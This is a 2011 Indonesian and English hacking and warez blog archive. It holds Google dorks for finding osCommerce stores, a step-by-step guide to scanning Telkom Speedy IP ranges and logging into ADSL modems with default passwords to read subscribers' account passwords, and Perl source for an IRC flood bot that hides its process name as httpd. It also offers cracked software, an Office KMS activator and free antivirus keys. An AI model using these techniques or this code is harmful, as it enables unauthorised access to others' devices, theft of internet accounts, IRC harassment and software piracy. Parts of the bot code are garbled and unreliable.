Jumat, 05 Agustus 2011

Osco Bugs 2011

!osco "Ecommerce Hosting by BigCommerce"
!osco "by BigCommerce"
!osco /googlecheckout/gcheckout.php
!osco /includes/modules/order_total
!osco /osc/catalog/admin
!osco /osc/catalog
!osco /store/includes/classes
!osco "oScommerce /catalog/includes/"
!osco /includes/classes/object_info.php
!osco /includes/functions/function.php
!osco /includes/functions/database.php
!osco "Powered by oScommerce"
!osco /catalog/index.php
!osco /admin/categories.php/login.php
!osco /catalog/images
!osco /catalog/classes
!osco /images/product_info.php
!osco /oscommerce/images/product_info.php
!osco /oscommerce/product_info.php
!osco "os_commerce"
!osco "/includes/classes/object_info.php"
!osco "/home/images/"+"oscommerce"
!osco "*.php?cPath=55" +Product
!osco "*.php?cPath=77" +Product
!osco "*.php?cPath=20" +Product
!osco "*.php?cPath=25" +Product
!osco "*.php?14" osc
!osco shop "My Account | Cart Contents | Checkout
!osco "by oscommerce" +web
!osco "by oscommerce" +"/shop/"
!osco nyoli "by oscommerce" +nl
!osco nyoli "by oscommerce" +ru
!osco "/admin/file_manager.php"
!osco index.php?cPath= ".com"
!osco "/asc/"+"Hard Drives"
!osco "powered by oscommerce" +new product
!osco "powered by oscommerce" +catalog
!osco "/store"+"*.php?cPath=28" site:.my
!osco "powered by oscommerce" +os_commerce
!osco "powered by oscommerce" +osc2
!osco "powered by oscommerce" +osc_
!osco "powered by oscommerce" +sys
!osco "powered by oscommerce" +/tienda/

Minggu, 22 Mei 2011

Transformers 3 Dark of the Moon 2011 DVDRip XviD











Sabtu, 09 April 2011

Kasperky Activation Key Kaspersky

For all bloggers are again looking for Kasperky Activation Key Kaspersky Internet Security and AntiVirus, here I share some key that is valid until 2012 for free .... please download and use bloggers as well - its good ....

1. Key Kaspersky Internet Security 2011 
2. Key Kaspersky Internet Security 2010
3. Key Kaspersky Internet Security 2009
4. Key Kaspersky Internet Security 2007
5. Key Kaspersky Anti Virus 2011
6. Key Kaspersky Anti Virus 2010
7. Key Kaspersky Anti Virus 2009
8. Key Kaspersky Anti Virus 2007 
So first .... mate if there are any suggestions or criticism ... welcome .... thank you ....

Key Kaspersky Valid 2012

Bagi sobat blogger semua yang lagi mencari Key Aktifasi Kasperky Internet Security maupun Kaspersky AntiVirus, nih saya share beberapa key yang valid sampai tahun 2012 secara gratis.... silakan sobat blogger download dan pergunakan sebaik - baik nya....

1. Key Kaspersky Internet Security 2011 
2. Key Kaspersky Internet Security 2010
3. Key Kaspersky Internet Security 2009
4. Key Kaspersky Internet Security 2007
5. Key Kaspersky Anti Virus 2011
6. Key Kaspersky Anti Virus 2010
7. Key Kaspersky Anti Virus 2009
8. Key Kaspersky Anti Virus 2007

 Sekian dulu sobat.... kalau ada saran atau kritikan... dipersilakan.... terima kasih.....

Senin, 04 April 2011

Office 2010 (Toolkit and EZ-Activator) 2.0.1 Final

This is a set of tools and functions for managing licensing and activating Office 2010. All output from these functions is displayed in the Information Console.
All functions are run in the background and the GUI is disabled to prevent running multiple functions, as this could conflict or damage Office 2010. The Channel Switcher, AutoKMS Uninstaller, AutoRearm Uninstaller, Office Uninstaller and Product Key Checker work even if Office 2010 is not installed. For information about individual functions, read further below.
OS : Windows XP/Vista/7 (x86/x64)
MS Office : 2010

Office 2010 Toolkit Functions

Main Tab

  • EZ-Activator: This is a universal and simple activator for Office 2010. It can use KMS activation even if you are using Retail License. EZ-Activator gathers information about your Office 2010 licensing status to provide the best method of activation. It can automatically attempt possible fixes in case of activation failure, and can reverse all changes in case of total failure.
  • Office 2010 Information: This states if Office 2010 is installed on your PC and whether it is 32 bit (x86), 64 bit (x64) or 32 bit running on 64 bit OS (x86-64).
  • Office Uninstaller: Run a script that will uninstall and cleanly remove Microsoft Office. Microsoft Office 2003 and later is supported.

Activation Tab

  • Office 2010 AutoKMS: AutoKMS is a scheduled task that will renew your 180 day KMS activation. Unlike other KMS activators, AutoKMS does not run 24/7 or only at the last minute with the hope it won’t fail, and leaves no traces of itself other than a scheduled task and exe file. It only attempts to activate KMS licenses (which saves a lot of time if you have non-KMS licenses such as MAK or Retail active). It will run at startup and then every 24 hours and attempt KMS activation a set amount of times. The Install/Uninstall buttons are used to install or remove AutoKMS.
  • Office 2010 AutoRearm: AutoRearm is a scheduled task that will allow you to use Office 2010 in grace period forever. It requires that you have at least 1 available rearm upon install. It works by taking a backup of your activation and restoring it when you run out of rearms. It runs on startup and then every 24 hours, and checks how many days left you have on your grace period. It will rearm if you have 5 or fewer days before your grace period expires. If the rearm fails because the count ran out (which is normal and inevitable), it restores the backup, which puts the count where it was upon install of AutoRearm. Because this grace period is likely expired, it then rearms (which is why at least 1 rearm is required). The backup will be restored upon uninstall.NOTE: Retail Office 2010 nags you for activation on startup. You can stop this by converting to VL and using KMS Product Key, which is done automatically by default.
  • Attempt Office 2010 Activation: This will attempt to activate any and all Office 2010 products.
  • Check Office 2010 Activation Status: This will display detailed information on Office 2010 activation including how many days you are licensed for, what Product Key and type of license you are using, and much more.
  • Rearm Office 2010: This resets the 30 day grace period that all Office 2010 products have. Rearm can be done up to 5 times. The available button will tell you how many rearms you have available.

License Files Tab

  • Add License: This will add the ability to use a Product Key for a certain Office 2010 product. You do not even need that Office 2010 product installed.
    It will install a provided Product Key if available; else you will have to install your own product key with Key Manager after License Add succeeds. All the provided Retail Product Keys are trials or blacklisted but can be rearmed for temporary use. The provided VL Product Keys are KMS Product Keys.
  • EX: This can be used to use Professional Plus License on Standard. This also lets you convert from Retail to VL. Set License Type to Volume and select the Office 2010 product that you want to convert to VL, then press Add. Vice Versa applies if you wish to convert VL to Retail. NOTE: There are no VL versions of Home and Business, Home and Student, and Professional so convert them to Professional Plus.
  • Delete All: This deletes all licensing information for Office 2010. This is meant to be used if your license details are corrupted or marked as tampered. This will force Office 2010 to repair itself and it will be in either Notifications Mode (VL) or Reduced-Functionality Mode (Retail). You will probably not be able to rearm to get out. You will have to activate which may fail with KMS Keygen. This is a last resort and should be used sparingly unless using EZ-Activator.NOTE: When Office 2010 repairs itself, it restores licenses for what you have physically installed; any Licenses added/converted using License Add or EZ-Activator will not be restored.

Product Keys Tab

  • Install: This will install an Office 2010 Product Key, using either a provided Product Key based upon your selection or a custom Product Key that you enter. A Product Key cannot be installed unless you have that Office 2010 License installed.
  • Uninstall: This will remove an Office 2010 Product Key, either removing the Product Key based upon your selection or a custom Product Key that you enter.
  • Check: This will give information on an Office 2010 Product Key, using either a provided Product Key based upon your selection or a custom Product Key that you enter. This information is what you would get from a PIDX checker.

License Backup Tab

  • Backup: This saves your Office 2010 licensing information so it can be restored later. This information is machine and install specific, so it usually won’t work after a reformat and definitely won’t work on different hardware. It saves the current state but does not stop the clock, so a 25 day old backup restored will be whatever days you had minus 25 when you took the backup. Backups are stored in subdirectories in a “Backups” folder that will be created in the same directory as the Office 2010 Toolkit executable using the name you entered.
  • Restore: Restores all of the information saved in a previous backup. It will take a temporary backup of your current state, delete your current state, and then restore the backup. If it fails to restore it will try to restore the temporary backup.


  • Microsoft .NET Framework 3.5 (It is built into Vista/7 so only XP users need to install this).
  • Office 2010 should be installed as most of the toolkit functions are obviously useless without Office 2010 installed.


Open Ports Scanner v2.4.Cracked-DJiNN

Open Ports Scanner v2.4.Cracked-DJiNN

Open Ports Scanner v2.4.Cracked-DJiNN | Size: 1.4 MB

This software monitors TCP and UDP open network ports and connections on your computer. It displays open port information, type of the connection, process ID and process name, local and remote port numbers, remote connection IP and state. This utility may help you to detect trojans and malicious software. You may close unwanted TCP connection right from this application or export the list of the connection for further research. Monitoring features include TCP/UDP display filter and desplayrefresh timer control


Nokia Hacking Kit untuk mengatasi “sertifikat kadaluarsa” pada ponsel Nokia S60v3

Quick Hacking Kit (Nokia Hacking Kit) adalah tool yang berfungsi untuk mengatasi masalah sertifikat kadaluarsa pada HP Nokia Symbian S60 v3, juga salah satu tool yang bisa digunakan untuk membuka akses folder-folder pada sistem yang tidak bisa dibuka pada ponsel Symbian Nokia S60v3 seperti folder private. Tool ini berfungsi secara otomatis, hanya diperlukan pemilihan file hack yang diinstal dan proses instalasi yang akan melakukan semuanya. Dalam menggunakan tool ini digunakan ponsel N6120c sebagai tester yang termasuk S60 v3 FP1 Symbian OS 9.2. Ingat, selalu perhatikan spesifikasi HP dalam mengaplikasikan teknik hack. Cek disini spesifikasi ponsel Nokia anda.
nokia hack,s60 v3
Pertama, download disini tool Quick Hacking Kit (Nokia Hacking Kit) lalu instal.
Sebaiknya diinstall dengan memilih memori internal HP.
nokia hack,s60 v3
Kedua, pilih dengan tepat komponen yang diinstal (seperti file installserver, disesuaikan dengan spesifikasi HP). Yang tidak berhubungan dengan tipe HP bisa diinstal semua, seperti Binpda Secman, caps on/off.
nokia hack,s60 v3
Ketiga, setelah terinstal akan ada icon shortcut aplikasi Secman dari Binpda. Lokasi biasanya diluar atau folder pribadi atau di tempat lain. Lalu jalankan aplikasi Secman.
nokia hack,s60 v3
nokia hack,s60 v3
Keempat, pada pilihan, pilih security off untuk membuka akses private folder. Untuk mengembalikan ke kondisi semula tinggal pilih lagi pilihan yang sama.
nokia hack,s60 v3
nokia hack,s60 v3
Gambar dibawah menunjukkan direktori aplikasi hack tertanam.
nokia hack,s60 v3
Apabila diinginkan untuk meng-uninstall bisa dilihat pada menu pilihan.
Setelah sukses diaplikasikan, masalah sertifikat kadaluarsa tidak akan muncul lagi pada saat meng-install aplikasi atau tema. Selain itu folder-folder yang awalnya tidak bisa dibuka akan mudah diakses untuk tujuan lebih lanjut.
 Tool Quick Hacking Kit

Hacking Modem ADSL dan Account Speedy

Langkah Pertama
Buka aplikasi mIRC dan koneksikan. Kemudian join di beberapa channel itu terserah anda, dalam hal ini gw mencari target di channel #balikpapan dan #samarinda. Sesudah anda join klik Server Status, kemudian ketikkan perintah ?/who #nama channel? tanpa tanda petik. Maka akan timbul beberapa teks. Biasanya IP dari Telkom Speedy angka awalnya adalah 125.xxx.xxx.xxx, IP inilah yang akan menjadi target scanning.
Langkah Kedua
Buka aplikasi Advanced Port Scanner v1.3, kemudian cari sebuah IP contoh ini merupakan sebuah IP TelkomSpeedy. Tetapi bukan IP itu yang akan kita scanning melainkan mengambil range IP dari, jadi angka yang diambil hanya 125.160.33. bukan dan range yang dipake dari 1-255. Lihat hasil dari scanning tersebut.


Langkah Ketiga
Tes IP tersebut dengan menggunakan web browser, disini gw memakai Mozilla Firefox kemudian masukan IP tersebut. apabila timbul pop up login berarti modem ADSL tersebut bisa di remote dari luar. Selanjutnya berbekal kemampuan untuk menembus password dari modem sebaiknya anda mencari tutorial mengenai beberapa password default sebuah modem dengan merk-merk yang berbeda. Defauld username password biasanya> admin


Gambar diatas merupakan login dari modem PROLINK type H9200.


Ini merupakan tampilan dari modem Prolink H920. Kemudian Pada kolom WAN Interfaces klik ppp-0 seperti yang terlihat pada gambar. Kemudian klik edit untuk melihat konfigurasi dari modem sekaligus untuk mencari account telkomspeedy.


Maka kita akan melihat tampilan seperti dibawah ini:


Untuk melihat password, cukup dengan klik kanan pada pop up diatas, view page source. Kemudian cari kata passwd. Lihat hasil pada gambar berikut:


Semua ini merupakan pembelajaran mengenai dunia hacking, penulis tidak bertanggung jawab atas kerusakan yang terjadi akibat penyalahgunaan artikel ini.

Advanced Port Scanner v1.3



Multilingual contents filtering - Anti-Porn supports real-time filtering or blocking porn websites, which is writed in English, Japanese, Korean, Russian, German, Franch, Spanish, simplified Chinese, traditional Chinese. AI to restrict games - Anti-Porn can determine which program is a game by itself. The parents needn't to add any game to a blacklist. Hide completely - You could not find Anti-Porn whether in the explorer or in the task manager. Everyone could not close or remove Anti-Porn without password.

Main features:
- Block porn web sites
- Anti-porn blocks thousands of porn web sites and predatory words.You also can predefine thing you don't let kids to see, for example, web site and offensive words.At the same time,you can control the filtering accuracy.
- Limit internet chat
- Anti-porn can limit many popular chatting softwares and web chat chambers.
- Limit internet access by day and time
- You can easily assign internet access time at certain hours, even on specific day.A special feature of Anti-Porn is that the PC time will be calibrate as Greenwich Time.
- Keep a complete log of the computer history
- Anti-porn keeps a detail log of all web sites visited, blocked or not.
- Record traffic data for an overview of internet use
- You can take an inventory of your children's computer, and find all pictures, movies, music files and web pages.
- Commend trusted web sites
- Anti-porn has commended several websites, which are fit for children. You also can add in any others.
- System requirements

* Any PC running Windows 95/98/2000, Windows ME, Windows NT or Windows XP.
* 16 MB RAM and 600KB of free hard disk space.
* A mouse or other tracking device.
* High Color display is recommended.

What's new in v
* Beautified the UI of the Control Center.

 Size: 4.95 Mb
 OS: Windows 2000/XP/Vista/7
 Home Page: www.tueagles.com
 Interface: English

Anti-Porn v15.2.8.23 + Crack




Jumat, 01 April 2011

Macromedia Dreamweaver 8 + Crack

Untuk mempelajari pemrograman web, kita membutuhkan software yang bisa dipakai untuk menulis perintah-perintah kode. Macromedia Dreamweaver 8 adalah salah satu solusinya. Software ini bisa digunakan untuk menulis script CSS, HTML, PHP, JavaScript, dan lain sebagainya. Selain itu, software ini membutuhkan memori yang sedikit, sehingga ringan digunakan. Ukurannya juga kecil, hanya 60MBan!

Meskipun macromedia sudah tidak lagi berjalan, dan produk ini akhirnya diteruskan oleh Adobe. Tapi masih banyak programmer yang memakai Macromedia Dreamwaver. Disini saya akan memberikan link download macromedia dreamwaver plus crack nya.

Download pada salah satu link berikut:

Dreamweaver Indowebster

Dreamweaver Mediafire


Flash merupakan salah satu bidang yang banyak diminati dalam bidang IT saat ini. Dengan flash kita dapat membuat gambar animasi, atau bahkan game. Untuk membuat sesuatu dari flash, kita membutuhkan software Macromedia Flash, atau yang lebih anyar lagi, kalian dapat menggunakan Adobe Flash.

Jika kalian berminat menggunakan software Macromedia Flash, IT Programmer akan memberikan link downloadnya. Silahkan download Macromedia Flash Professional 8 beserta keygen nya. Download pada link berikut ini:


Minggu, 27 Maret 2011

Sejarah Mikrotik

Dalam dunia router, mesin yang berfungsi mengarahkan alamat di Internet, Cisco merupakan nama yang sudah tidak diragukan lagi. Tetapi di dunia lain, nama Mikrotik, yang berbentuk software, lumayan dikenal sebagai penyedia solusi murah untuk fungsi router, bahkan kita dapat membuat router sendiri dari komputer rumahan. Untuk negara berkembang, solusi Mikrotik sangat membantu ISP atau perusahaan-perusahaan kecil yang ingin bergabung dengan Internet.

Walaupun sudah banyak tersedia perangkat router mini sejenis NAT, dalam beberapa kondisi penggunaan komputer dan software Mikrotik merupakan solusi terbaik. Mikrotik adalah perusahaan kecil berkantor pusat di Latvia, bersebelahan dengan Rusia, pembentukannya diprakarsai oleh John Trully dan Arnis Riekstins. John Trully adalah orang Amerika yang berimigrasi ke Latvia dan berjumpa Arnis yang sarjana Fisika dan Mekanik di sekitar tahun 1995. Tahun 1996 John dan Arnis mulai me-routing dunia (visi Mikrotik adalah me-routing seluruh dunia). Mulai dengan sistem Linux dan MS DOS yang dikombinasikan dengan teknologi Wireless LAN (W-LAN) Aeronet berkecepatan 2Mbps di Molcova, tetangga Latvia, baru kemudian melayani lima pelanggannya di Latvia. Ketika saya menanyakan berapa jumlah pelanggan yang dilayaninya saat ini, Arnis menyebut antara 10 sampai 20 pelanggan saja, karena ambisi mereka adalah membuat satu peranti lunak router yang handal dan disebarkan ke seluruh dunia. Ini agak kontradiksi dengan informasi yang ada di web Mikrotik, bahwa mereka mempunyai 600 titik (pelanggan) wireless dan terbesar di dunia. Padahal dengan wireless di Jogja dan Bandung saja, kemungkinan besar mereka sudah kalah bersaing. Prinsip dasar mereka bukan membuat Wireless ISP (WISP), tapi membuat program router yang handal dan dapat dijalankan di seluruh dunia. Latvia hanya merupakan “tempat eksperimen” John dan Arnis, karena saat ini mereka sudah membantu negara-negara lain termasuk Srilanka yang melayani sekitar empat ratusan pelanggannya.

Linux yang mereka gunakan pertama kali adalah Kernel 2.2 yang dikembangkan secara bersama-sama dengan bantuan 5 – 15 orang staf R&D Mikrotik yang sekarang menguasai dunia routing di negara-negara berkembang. Selain staf di lingkungan Mikrotik, menurut Arnis, mereka merekrut juga tenaga-tenaga lepas dan pihak ketiga yang dengan intensif mengembangkan Mikrotik secara maraton. Ketika ditanya siapa saja pesaing Mikrotik, Arnis tersenyum dan enggan mengatakannya. Sewaktu saya simpulkan tidak ada pesaing, Arnis dengan sedikit tertawa menyebut satu nama yang memang sudah lumayan terkenal sebagai produsen perangkat keras khusus untuk teknologi W-LAN, yaitu Soekris dari Amerika. Tujuan utama mereka berdua adalah membangun software untuk routing, sementara kebutuhan akan perangkat keras juga terus berkembang, sehingga akhirnya mereka membuat berbagai macam perangkat keras yang berhubungan dengan software yang mereka kembangkan. Semangat Mikrotik ini agak berbeda dari kebanyakan perusahaan sejenis di Amerika, karena mereka berkonsentrasi di pengembangan software lalu mencari solusi di hardware-nya dengan mengajak pihak ketiga untuk berkolaborasi. Dan kita dapat melihat ragam perangkat yang mereka tawarkan menjadi semakin banyak, mulai dari perangkat yang bekerja di frekwensi 2,4GHz dan 5,8GHz sampai ke interface dan antena.

Minggu, 13 Maret 2011



my $server = $ARGV[0];
my $port="6667";
my $channel="#Eka,#artomoro,#taplau";
my $owner= "Kokain";
my $procname="/usr/sbin/httpd";

my @nickname = ("D`Archer","D`Punk","D`Attacker","D`Combater","D`Civil","D`Defender","D`Brave",
  "Bellini","Belloc","Benedict-Dye","Bergson","Berke-Jenkins","Bernardo",        "Bernassola","Bernston","Berrizbeitia","Betti","Beynart","Biagioli",

my @realname  = (" 4-=[ 15[ 14[ 0,4 Created 14] 15] - 15[ 14[ 1,8 By 14] 15] - 15[ 14[ 4,1Merah 0,1Putih 14] 15] ]=-");
my @WHO;
my $qqum="*";
if ($ARGC !=1) {
print "\n+ putri-bot\n";
 print "+ Aturan Pakai : perl $0 (server)\n";
 print "+ betulin dulu sekripnya boss..\n\n";
$SIG{CHLD} = sub { wait }; # alterando o signal
my $qtip = qx(/sbin/ifconfig |grep inet | wc -l);
my @ips1 =qx(/sbin/ifconfig |grep \"inet addr\:\" \|awk \-F \' \' \'\{\print \$2\} \' \| cut \-c6\-);
my @ips2 =qx(/sbin/ifconfig \-a |grep \"inet end\.\:\" \|awk \-F \' \' \'\{\print \$3\} \');
my @fbsd =qx(/sbin/ifconfig \|grep \"inet\" \|awk \-F \' \' \'\{\print \$2\} \' \| cut \-c1\-);
@ips = (@ips1, @ips2, @fbsd);
open(ipzitcho,">ips.txt") || die "- ips.txt not found";
          print ipzitcho" @ips";
@ips = grep { s/\n$// } @ips;
$0 =  $procname  . "\0";
$nick2 = $nick;
print STDOUT "\n+ user\n";
print STDOUT "+ Server : $server\n";
print STDOUT "+ Port   : $port\n";
print STDOUT "+ Owner  : $owner\n";
print STDOUT "+ Channel: $channel\n";
print STDOUT "+ IPs    : $qtip\n\n";
use IO::Socket;
foreach my $FROM (@ips) {
 my $pid = fork(); # gerando um novo processo
  unless ($pid) {   #
my $ident = $nickname[rand scalar @nickname];
my $nick = $nickname[rand scalar @nickname];
my $name = $realname[rand scalar @realname];
$sock=IO::Socket::INET->new(LocalAddr => $FROM, Proto=>"tcp", PeerAddr=> $server, PeerPort=> $port) || exit();
   print $sock "NICK ".$nick."\n";
    print $sock "USER $ident $FROM $server :$name\n";
while (<$sock>) {
        if (/^:.+?\s433\s/) { # nick already in use
            $nick2 = $nickname[rand scalar @nickname];
            print $sock "NICK ".$nick2."\n";
        if (/^:.+?\s376\s/) { # end of motd
            print $sock "JOIN $channel\n";

        if(/^PING :(.*)/){ #replying the ping
            print $sock "PONG :$1\n";
        if(/^\:$owner!.*\@.*PRIVMSG.*:.bot (.*)/){
            print $sock "$1";
            print $sock "PRIVMSG ".$owner." : genol\n";
            print $sock "PRIVMSG ".$owner." : #enjoy Crew\n";
            print $sock "PRIVMSG ".$owner." : ------------\n";
            print $sock "PRIVMSG ".$owner." : .bot join #chan\n";
            print $sock "PRIVMSG ".$owner." : .bot part #chan\n";
            print $sock "PRIVMSG ".$owner." : .msg nick (nick)\n";
            print $sock "PRIVMSG ".$owner." : .quit\n";
            print $sock "PRIVMSG ".$owner." : ------------\n";
            print $sock "PRIVMSG ".$owner." : .ctcpflood (nick)\n";
            print $sock "PRIVMSG ".$owner." : .dccflood (nick)\n";
            print $sock "PRIVMSG ".$owner." : .noticeflood (nick)\n";
            print $sock "PRIVMSG ".$owner." : .msgflood (nick)\n";
            print $sock "PRIVMSG ".$owner." : .hop #chan (pesan)\n";
                        print $sock "PRIVMSG ".$1." : ".$2."\n";
                        print $sock "who ".$channel."\n";
      if (/^:.+?\s+352\s+\S+\s+\S+\s+(.+?)$/) {
                        my $nicks = $1;
                        #$nicks =~ s/\n//;
                        #$nicks =~ s/\r//;
                        push(@WHO, split(/ /, $nicks));
                        print STDOUT "$who[1]\n";
                        for (1 .. 5) {
                        print $sock "PRIVMSG ".$1." :\001DCC CHAT chat 1121485131 1024\001\n";
                        for (1 .. 5) {
                        print $sock "whois ".$1."\n";
      if(/^\:$owner!.*\@.*PRIVMSG.*:.hop (.*)/){
                print $sock "JOIN ".$1." : ".$2."\n";
                        for (1 .. 5) {
                        print $sock "PART ".$1." : ".$2."\n";
                        print $sock "JOIN ".$1." : ".$2."\n";
                print $sock "PRIVMSG ".$1." :\001VERSION\001\n";
                        for (1 .. 5) {
                        print $sock "PRIVMSG ".$1." :\001VERSION\001\n";
                        print $sock "PRIVMSG ".$1." :\001PING\001\n";
                        for (1 .. 5) {
                        print $sock "PRIVMSG ".$1." : 4susumu cilikkkkkkkkk \n";
                        for (1 .. 5) {
                        print $sock "NOTICE ".$1." : 4susumu cilikkkkkkkkk \n";
      if(/^ERROR :(.*)/){
                        use IO::Socket;
                        $sock=IO::Socket::INET->new(LocalAddr => $FROM, Proto=>"tcp", PeerAddr=> $server, PeerPort=> $port)

|| exit();
                        print $sock "NICK ".$nick."\n";
                        print $sock "USER $ident $FROM $server :$name\n";
      if(/^\:.*: Connection timed out(.*)/){
                        print STDOUT "[~] Connection Timed Out! Retrying!\n";
                        use IO::Socket;
                        $sock=IO::Socket::INET->new(LocalAddr => $FROM, Proto=>"tcp", PeerAddr=> $server, PeerPort=> $port)

|| exit();
                        print $sock "NICK ".$nick."\n";
                        print $sock "USER $ident $FROM $server :$name\n";
                        print $sock "PRIVMSG ".$owner." : Bot genol\n";
                        print $sock "PRIVMSG ".$owner." : Using server : $server\n";
                        print $sock "PRIVMSG ".$owner." : Using port   : $port\n";
                        print $sock "PRIVMSG ".$owner." : Using nick   : $nick\n";
                        print $sock "PRIVMSG ".$owner." : Using owner  : $owner\n";
                        print $sock "PRIVMSG ".$owner." : Using ident  : $id\n";
                        print $sock "PRIVMSG ".$owner." : putri-bot\n\n";
       if( /^\:$owner!.*\@.*\s+PRIVMSG.*:.owner\s+(.*)/ ){
                       $owner =$1;
                       $owner =~ s/ //;
                       $owner =~ s/\r$//;
                       $owner =~ s/\n$//;
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